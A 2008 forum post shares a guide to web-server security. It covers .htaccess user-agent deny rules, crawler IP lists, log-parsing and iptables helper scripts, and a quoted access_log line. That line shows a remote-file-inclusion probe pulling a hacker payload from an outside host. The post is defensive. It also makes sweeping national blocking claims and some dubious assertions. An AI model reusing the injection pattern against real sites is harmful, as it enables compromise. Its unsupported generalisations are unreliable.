sparky Posted September 6, 2008

I thought I'd share this info as I found it quite interesting and very true.

How to protect your web site - .htaccess and server security: what to put into your .htaccess file to enhance your server's security.

First of all you have to be aware that the greatest and first-above-all security risk for your entire site is you: your lack of knowledge about the details of your own site, about the scripts you have installed, and about server security in general. It is far too easy nowadays to download a bunch of free software - blog, forum, CMS - and let a few clicks and some semi-automated install scripts do the job for you. Fine, you think, and start to invite friends and users from your mailing list to post, to publish, to chat, to be interactive in all possible ways ...

A typical point of entry into your site, your server or your scripts is through the doors you left open: faulty scripts, missing site/file or folder permissions, and incomplete server configurations.

To give you a reality shock: my own server had, from early this year until earlier today, a total of 218'937 password crack attempts - that's more than 500 each day, several hackers each day. That appears to be the global average and is quite normal! Do YOU know how many attempts YOU had during this past year? If not, then you are grossly negligent and a danger to yourself and the whole www society, because then you simply are far beyond your own limits of skill, knowledge and expertise - or simply careless about global security.
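If you want to find out your own number, a small sketch like the following can count failed password attempts per source IP. It is a hypothetical helper, not a finished tool, and it assumes the common sshd log line format ("Failed password ... from <IP>") found in /var/log/auth.log or /var/log/secure - adapt the pattern to whatever your server actually logs:

```python
import re
from collections import Counter

# Hypothetical sketch: count failed SSH password attempts per source IP.
# Assumes the common sshd format "Failed password for [invalid user] NAME from IP".
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?\S+ from (\d+\.\d+\.\d+\.\d+)"
)

def count_failed_logins(lines):
    """Return a Counter mapping source IP -> number of failed attempts."""
    hits = Counter()
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            hits[m.group(1)] += 1
    return hits

if __name__ == "__main__":
    sample = [
        "Sep  6 03:12:01 host sshd[123]: Failed password for root from 10.0.0.5 port 4242 ssh2",
        "Sep  6 03:12:03 host sshd[123]: Failed password for invalid user admin from 10.0.0.5 port 4243 ssh2",
        "Sep  6 03:15:00 host sshd[130]: Accepted password for me from 192.168.1.2 port 22 ssh2",
    ]
    print(count_failed_logins(sample))  # only 10.0.0.5 shows up, with 2 attempts
```

Feed it your real log file line by line and you will know, within minutes, whether your own numbers look anything like the 500-per-day average above.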
A few days ago I met a typical example of such a careless site owner - in recent weeks he had opened yet another new web site for his real estate business. When I talked about server security, about hackers setting up phishing mail sites on his server, about hackers possibly using his server to damage others or to get passwords and access data to other people's bank accounts, all he repeatedly said was "I don't care!" He is not one of the millions without knowledge or experience - on the contrary, his knowledge is far above average, at a professional level. But he doesn't care - period.

With the above in your heart and mind: it is above all you who has to learn how to secure the software you install. Meanwhile, of course, there also are a few other steps to successfully block some attempts in their early stages. Note that the .htaccess configuration below is absolutely NO replacement for your own care and a careful, security-oriented configuration of your entire web site and server. But the .htaccess entries below may provide additional protection before a risk even occurs.

To collect data about possible "victim sites", potential hackers first need to find vulnerabilities: sites with unfixed security holes, sites with particular scripts installed, etc. Hence some of the malicious activity requires preparation done by bots - by user agents. The list below is a small list of the most malicious bots - there certainly exist far more.
Here below is a full, security-related example of a .htaccess entry - you may safely copy and paste the following lines into the .htaccess file at the root level of your site:

SetEnvIf User-Agent "Indy Library" stayout=1
SetEnvIf User-Agent "libwww-perl" stayout=1
SetEnvIf User-Agent "Offline Navigator" stayout=1
SetEnvIf User-Agent "Xaldon WebSpider" stayout=1
SetEnvIf User-Agent "Wget" stayout=1
SetEnvIf User-Agent "WebImages" stayout=1
SetEnvIf User-Agent "WebCapture" stayout=1
SetEnvIf User-Agent "LiteFinder" stayout=1
SetEnvIf User-Agent "disco" stayout=1
SetEnvIf User-Agent "SBIder" stayout=1
SetEnvIf User-Agent "MJ12bot" stayout=1
Order Allow,Deny
Allow from all
Deny from env=stayout

Let me explain a little of what some of the above bots do - but first, the criteria I used to select them. All of them leave an entry in the access_log file of your Apache server. The usual behavior of a bot/agent is to leave a URL pointing to that bot's homepage or project page. Hence I visited the homepages OR verified the precise activities of each bot to really see what that bot was doing on my web site. By far not every bot does what its project page or homepage says or pretends it does!

Example 1: LiteFinder Network Crawler

An example of such research, and the basis for denying access, is shown below for the bot "LiteFinder" and its home URL http://www.litefinder.net/about.html, where we read:

"... LiteFinder Network Crawler is a research project started by a group of Indian candidates from the cities of Bangalore, Patna and Jaipur. The project serves as a testing ground for information search technologies and programs, developed by a group of young scientists. LiteFinder Network Crawler was started as the means of simplifying the search of specific information at the sites that can be found with the help of general-purpose search engines. ..."

A little further down we read:

Can I learn the IP addresses, which LiteFinder Network Crawler comes from?
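How the block works: each SetEnvIf line matches an unanchored pattern against the User-Agent request header and sets the stayout variable on a hit; "Deny from env=stayout" then refuses the request with a 403. The logic can be sketched in Python (a hypothetical simulation for illustration only - this is not Apache itself):

```python
import re

# Simulation of the SetEnvIf rules above: the second argument of SetEnvIf
# is an unanchored regular expression matched against the User-Agent header.
# A match sets the stayout variable; "Deny from env=stayout" then sends 403.
BAD_AGENT_PATTERNS = [
    "Indy Library", "libwww-perl", "Offline Navigator", "Xaldon WebSpider",
    "Wget", "WebImages", "WebCapture", "LiteFinder", "disco",
    "SBIder", "MJ12bot",
]

def is_blocked(user_agent: str) -> bool:
    """Return True if a request with this User-Agent would be denied (403)."""
    return any(re.search(p, user_agent) for p in BAD_AGENT_PATTERNS)

print(is_blocked("libwww-perl/5.69"))              # True  -> 403 Forbidden
print(is_blocked("Mozilla/5.0 (Windows NT 6.1)"))  # False -> request allowed
```

Note that this is a match anywhere in the header, so a pattern like "disco" will also catch longer agent strings containing that word - exactly the behavior you get from SetEnvIf.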
"Unfortunately, You can't since it is against the rules of our company."

Here is a list of LiteFinder IPs collected from this year's access_log files on my server, plus a few additions from Project Honey Pot:

64.34.255.239
67.19.250.26
71.158.134.213
74.53.249.34
75.125.52.146
75.125.18.178
216.40.220.18
216.40.220.34
216.40.222.66
216.40.222.82
216.40.222.98

My opinion: only criminals have something to hide! On the same page:

"Does LiteFinder Network Crawler accept the directives from robots.txt file?
LiteFinder Network Crawler can recognize the directives from robots.txt files only partially, which is the result of the scantiness of our resources. Full support of robots.txt will be launched soon."

Every decent bot DOES follow the robots.txt rules - the statement above simply means the "research project" wants to sneak into your server and site to collect data beyond what you would expect and allow. They can do so safely, knowing well that the vast majority of site owners have zero knowledge about hackers, security issues and risks, and may never discover any malicious activity - or discover hackers inside their own server - until their host or a cybercrime-investigating agency such as IC3 (Internet Crime Complaint Center), the CIA or the FBI contacts them. All three agencies mentioned have their own specialized cybercrime department, a web site and an online registration page to file formal complaints. An earlier article may help you learn more about security aspects of your home computer and web server.

Example 2: Indy Library

Indy Library is a bot that is used / was used on my site tens of thousands of times from a large and growing number of Chinese IPs - just to create fake traffic and load a few pages thousands of times each day, for no other reason than to make an entire country appear bigger and thus more important www-wise.
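Once you have collected such an IP list, you can turn it into firewall rules. Here is a small hypothetical helper that only prints the iptables commands for review rather than executing anything; the chain and target (INPUT / DROP) are assumptions, so adapt them to your own firewall setup before running the output:

```python
# Hypothetical helper: turn a list of abusive IPs (like the LiteFinder list
# above) into iptables commands that drop all traffic from them. The commands
# are printed for review only, never executed; chain and target (INPUT / DROP)
# are assumptions - adapt them to your own firewall layout.
LITEFINDER_IPS = [
    "64.34.255.239", "67.19.250.26", "71.158.134.213", "74.53.249.34",
    "75.125.52.146", "75.125.18.178", "216.40.220.18", "216.40.220.34",
    "216.40.222.66", "216.40.222.82", "216.40.222.98",
]

def iptables_rules(ips):
    """Return one 'iptables -A INPUT -s <ip> -j DROP' line per IP."""
    return ["iptables -A INPUT -s %s -j DROP" % ip for ip in ips]

for rule in iptables_rules(LITEFINDER_IPS):
    print(rule)
```

Review the printed lines, then paste them into a root shell (or your firewall init script) once you are sure none of the addresses belong to legitimate visitors.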
In this case I have denied access to the bot - and since China hosts many hackers, I have also blocked most Chinese networks using iptables.

Example 3: libwww-perl

The libwww-perl agent is used to do real bad stuff very directly. Research in my access_log files shows that many attempts made with libwww-perl try to directly inject pictures or files into your site - fully automated. Such files typically contain infected code under various file extensions: txt, jpg and many others. Denying access to the bot will first lead to entries in error_log, where you can easily verify the exact activity and also extract IPs for a later full block, again using iptables.

Here below is an access_log entry typical for libwww-perl users. Even without being a real IT/www pro, you can see that these intentions are definitely of a most destructive nature. Anyone who allows the UPLOAD of any kind of file (txt, html, jpeg, gif, png) may end up hosting hacker files like the one linked in the request below.

access_log-20071031.gz:81.169.184.193 - - [31/Oct/2007:23:17:47 +0800] "GET /wallpapers/widescreen_wallpapers/_theme/breadcrumb.php?rootBase=http://www.2send.us/uploads/1765f39098.txt? HTTP/1.1" 404 19393 "-" "libwww-perl/5.69"

This libwww-perl visit served the purpose of finding a script vulnerability in a file "breadcrumb.php" in a subfolder commonly named _theme - but non-existing on my site, hence the server response 404 (file not found):

/wallpapers/widescreen_wallpapers/_theme/breadcrumb.php?rootBase=http://www.2send.us/uploads/1765f39098.txt?

The actual hacker file to be planted on the victim's site would be the file located at http://www.2send.us/uploads/1765f39098.txt - and at the moment of this writing, that hacker file still existed on 2send.us ...

Reasons to deny access to a particular user agent

As the examples above show, the reason to deny access using .htaccess and/or iptables is above all security, and also bandwidth.
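Extracting the offending IPs from such log lines is easy to automate. The sketch below assumes the Apache combined log format shown in the example above (IP, identity, user, timestamp, request, status, size, referer, user agent) and collects the IPs of all libwww-perl requests - a hypothetical starting point, not a finished tool:

```python
import re

# Hypothetical sketch: pull the client IP and User-Agent out of Apache
# combined-log-format lines, so libwww-perl requests (like the example
# above) can be collected for a later iptables block.
LOG_RE = re.compile(
    r'(?P<ip>\d+\.\d+\.\d+\.\d+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<request>[^"]*)" (?P<status>\d+) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)

def libwww_ips(lines):
    """Return the set of client IPs whose User-Agent contains libwww-perl."""
    ips = set()
    for line in lines:
        m = LOG_RE.search(line)
        if m and "libwww-perl" in m.group("agent"):
            ips.add(m.group("ip"))
    return ips
```

Because the regex uses search() rather than match(), it also copes with the "access_log-20071031.gz:" filename prefix that grep prepends when you search rotated, compressed logs with zgrep.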
If a search engine comes many thousands of times per month but creates zero human traffic - as in one case I studied - then that search engine's bot needs to be grounded, both by an entry in .htaccess and by iptables.

Never take my .htaccess list above for granted. You may make your life easier and simply copy and paste the deny list into your own .htaccess file - but if you have time to spare, use a Google search to research each and every one of the above agents, make up your own mind, and decide based on your own preferences, likes and dislikes. Study all your server log files intensely - dozens of hours if needed and possible - to learn what some of these bots want to do or can do, and to see what typical and sometimes weird paths such bots travel on your site, into admin areas or areas where no single person other than you ever has any business to stay. Learn to understand how hackers work and - while staying polite and loving - secure your site as tightly as ever possible.
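A quick way to start that log study is to rank user agents by request volume. This hypothetical sketch counts requests per User-Agent, assuming the combined log format where the agent is the last quoted field of each line; agents at the top of the list with no matching human traffic are your candidates for research:

```python
import re
from collections import Counter

# Hypothetical sketch: count requests per User-Agent in an Apache
# combined-format access_log, to spot bots that hit the site thousands
# of times per month while sending no human visitors.
AGENT_RE = re.compile(r'"([^"]*)"$')  # last quoted field = User-Agent

def requests_per_agent(lines):
    """Return a Counter mapping User-Agent string -> request count."""
    counts = Counter()
    for line in lines:
        m = AGENT_RE.search(line.rstrip())
        if m:
            counts[m.group(1)] += 1
    return counts

# Typical usage on a real log file:
#   with open("access_log") as f:
#       for agent, n in requests_per_agent(f).most_common(20):
#           print(n, agent)
```

Run it over a full month of logs and compare the bot counts against your actual visitor numbers before deciding whom to ground.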